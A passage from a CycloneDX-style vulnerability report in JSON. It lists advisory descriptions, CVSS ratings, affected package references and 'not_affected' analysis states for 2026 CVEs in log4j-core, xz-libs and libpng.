              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f"
        },
        {
          "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-34478",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        117,
        684
      ],
      "description": "Apache Log4j Core's  Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes.\n\nTwo distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly:\n\n  *  The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output.\n  *  The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping.\n\n\nUsers of the SyslogAppender are not affected, as its configuration attributes were not modified.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34478"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/10/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34478"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4074"
        },
        {
          "url": "https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-34478"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34478"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34478"
        }
      ],
      "published": "2026-04-10T16:16:31+00:00",
      "updated": "2026-04-24T18:10:57+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f"
        },
        {
          "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-34480",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        116
      ],
      "description": "Apache Log4j Core's  XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  producing invalid XML output whenever a log message or MDC value contains such characters.\n\nThe impact depends on the StAX implementation in use:\n\n  *  JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.\n  *  Alternative StAX implementations (e.g.,  Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.\n\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34480"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/10/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34480"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4077"
        },
        {
          "url": "https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-34480"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34480"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34480"
        }
      ],
      "published": "2026-04-10T16:16:31+00:00",
      "updated": "2026-04-24T18:21:54+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f"
        },
        {
          "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-34743",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        122
      ],
      "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34743"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34743"
        },
        {
          "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87"
        },
        {
          "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3"
        },
        {
          "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743"
        }
      ],
      "published": "2026-04-02T19:21:33+00:00",
      "updated": "2026-04-15T17:33:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "5.2.5-8.el9_0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-34757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34757"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34757"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a"
        },
        {
